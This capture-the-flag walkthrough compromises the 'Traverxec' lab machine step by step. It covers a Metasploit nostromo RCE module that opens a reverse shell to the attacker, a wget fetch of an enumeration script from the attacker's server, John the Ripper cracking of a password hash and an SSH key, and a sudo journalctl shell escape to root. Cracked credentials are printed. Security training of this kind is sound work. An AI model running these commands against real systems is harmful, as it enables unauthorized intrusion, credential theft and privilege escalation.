Traverxec

Traverexec is a easy difficulty linux machine that's a good introduction to web to host exploitation as well as SSH usage
Recon
we start off by scanning Traverexec's IP 10.10.10.165
with nmap
nmap -T4 -A -v 10.10.10.165
From our results we get the following ports and services
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Right off we see that it's only running 2 services and we have potentially have the server service name nostromo
We can use searchsploit
to check if there are any existing exploits for nostromo V1.9.6 using searchsploit nostromo
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Perfect we find that there's a RCE exploit for this version of nostromo.
Now lets fire up Metsploit Framework with msfconsole
and search for the exploit search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
Perfect! msf has the exploit we want to use now lets select and configure it
Exploit
use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run
after a few seconds we should get the following
[*] Started reverse TCP handler on 10.10.15.64:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700
Great! we have shell, unfortunately it's a limited shell but we can fix that up by upgrading it to a full PTY
shell with python -c 'import pty:pty.spawn("/bin/bash")'
Now with a full shell lets enumerate some more seeing as we are just a low privelage shell right now, we need to get user. To do this we will get LinEnum https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Once we have it, it's time to get it on the victim to do this we'll fire up python -m simpleHTTPServer
and on the victim we'll do wget IP Port/LinEnum.sh
once we have it we need to set it's permissions with chmod +x LinEnum.sh
and then run it ./LinEnum.sh
Upon completetion we find one line that stands out
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
We got a password hash!, coming back to our local machine, we'll put that hash into a file and run it through John
touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me (david)
Upon completion we get the password Nowonly4me
Wee also see that within /home/david/public_www
contains a folder protected-file-area
which is protected by.htaccess
checking nostromo
documentation http://www.nazgul.ch/dev/nostromo_man.html we see that there is yet another director we can access ~david
trying to access this directory gives us the following page

Doesn't look very interesting does it? well typing in the url 10.10.10.165/~david/protected-file-area
gives us a auth screen and we already have the credentials for it david:Nowonly4me
it takes us to a index page where we can download backup-ssh-identity-files.tgz
Once downloaded we can extract the ssh keys it gives us the following files
/david/.ssh/
/david/.ssh/authorized_keys
/david/.ssh/id_rsa
/david/.ssh/id_rsa.pub
Unfortunately the id_rsa
is encrypted but luckily we can pass it through john
python/usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter (/root/HTB/Traverexec/home/david/.ssh/id_rsa)
Great! we got the password hunter
we can now use this with id_rsa
to connect via ssh
ssh -i id_rsa david@10.10.10.165
And With that we have User!
Post Exploitation
Checking David's home dir we find
david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david 802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .
server-stats.head
Gives us a banner not much useful, however checking server-stats.sh
We get the following
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
shows us that journalctl
is running as root, so can we exploit this?
Yes we can! Checking GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ we find that simply typing !/bin/sh
from within journalctl
can give us root access! /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh
root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
Useful Links
Last updated